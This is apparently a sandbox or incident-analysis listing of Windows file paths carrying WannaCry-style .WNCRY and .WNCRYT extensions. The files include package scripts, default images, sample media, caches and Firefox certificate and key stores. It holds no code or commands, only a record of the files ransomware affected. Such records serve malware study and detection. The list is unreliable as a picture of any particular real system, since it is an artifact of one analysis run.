C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd.WNCRYT
C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd.WNCRY
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRY
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRY
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRY
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRY
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRY
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\user.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\user.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{1A0A057C-F009-4C89-B7DC-E386BCD2DDFD}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{1A0A057C-F009-4C89-B7DC-E386BCD2DDFD}.2.ver0x0000000000000002.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001e.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001e.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000023.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000023.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000025.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000025.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{8396BDEC-CD34-467F-8EB0-706C57B90A2C}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{8396BDEC-CD34-467F-8EB0-706C57B90A2C}.2.ver0x0000000000000002.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{887A11BA-C40B-40DA-A994-13F5794EDA58}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{887A11BA-C40B-40DA-A994-13F5794EDA58}.2.ver0x0000000000000002.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{B77EA8CB-9C6F-4A20-B584-EAC4FF2DF997}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{B77EA8CB-9C6F-4A20-B584-EAC4FF2DF997}.2.ver0x0000000000000002.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000001.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000001.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000002.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000003.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000003.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Caches\{ECA0F554-74BF-4F43-9EC2-07E05C31BB3E}.2.ver0x0000000000000001.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{ECA0F554-74BF-4F43-9EC2-07E05C31BB3E}.2.ver0x0000000000000001.db.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma.WNCRY
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma.WNCRY
C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB.WNCRYT
C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB.WNCRY
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRY
C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRYT
C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRY
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRYT
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRY
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRYT
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRY
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRYT
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRY
C:\Users\user\AppData\Local\IconCache.db.WNCRYT
C:\Users\user\AppData\Local\IconCache.db.WNCRY
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRY
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db.WNCRY
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db.WNCRY
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js.WNCRY
C:\Users\All Users\Boxstarter\BoxStarter.bat.WNCRYT
C:\Users\All Users\Boxstarter\BoxStarter.bat.WNCRY
C:\Users\All Users\Boxstarter\NOTICE.txt.WNCRYT
C:\Users\All Users\Boxstarter\NOTICE.txt.WNCRY
C:\Users\All Users\Boxstarter\VERIFICATION.txt.WNCRYT
C:\Users\All Users\Boxstarter\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat.WNCRYT
C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat.WNCRY
C:\Users\All Users\chocolatey\bin\_processed.txt.WNCRYT
C:\Users\All Users\chocolatey\bin\_processed.txt.WNCRY
C:\Users\All Users\chocolatey\config\chocolatey.config.backup.WNCRYT
C:\Users\All Users\chocolatey\config\chocolatey.config.backup.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1.WNCRYT
